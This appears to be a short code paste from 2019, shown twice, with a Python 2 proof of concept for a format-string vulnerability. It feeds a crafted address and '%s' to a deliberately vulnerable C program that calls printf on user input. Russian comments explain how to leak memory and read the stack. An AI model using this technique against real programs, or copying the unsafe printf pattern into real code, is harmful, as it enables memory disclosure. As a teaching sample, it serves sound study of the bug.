v14dislav · June 26, 2019 14:39
diff --git a/vulnprintf.c b/vulnprintf.c
 arg= "\x79\x01\x43\x77%s"
 cmdline = "C:\\Users\\designer\\Desktop\\printf\\src.exe {}".format(arg)

 import binascii
 import subprocess

 output = subprocess.check_output(cmdline, shell=True)
 output = binascii.b2a_hex(output)

 print output
 # через питон вызывается .exe с аргументами. через %s можно сливать память (код и данные) до 0x00, потом отступить и сливать дальше
 # %d, %p, %08x могут читать стек

 // src.c
 #include <stdio.h>
 int main(int argc, char** argv) {
 	char buffer[40];
 	strncpy(buffer, argv[1], 40);
 	printf(buffer);
 	return 0;
 }
	arg= "\x79\x01\x43\x77%s"
	cmdline = "C:\\Users\\designer\\Desktop\\printf\\src.exe {}".format(arg)

	import binascii
	import subprocess

	output = subprocess.check_output(cmdline, shell=True)
	output = binascii.b2a_hex(output)

	print output
	# через питон вызывается .exe с аргументами. через %s можно сливать память (код и данные) до 0x00, потом отступить и сливать дальше
	# %d, %p, %08x могут читать стек

	// src.c
	#include <stdio.h>
	int main(int argc, char** argv) {
	char buffer[40];
	strncpy(buffer, argv[1], 40);
	printf(buffer);
	return 0;
	}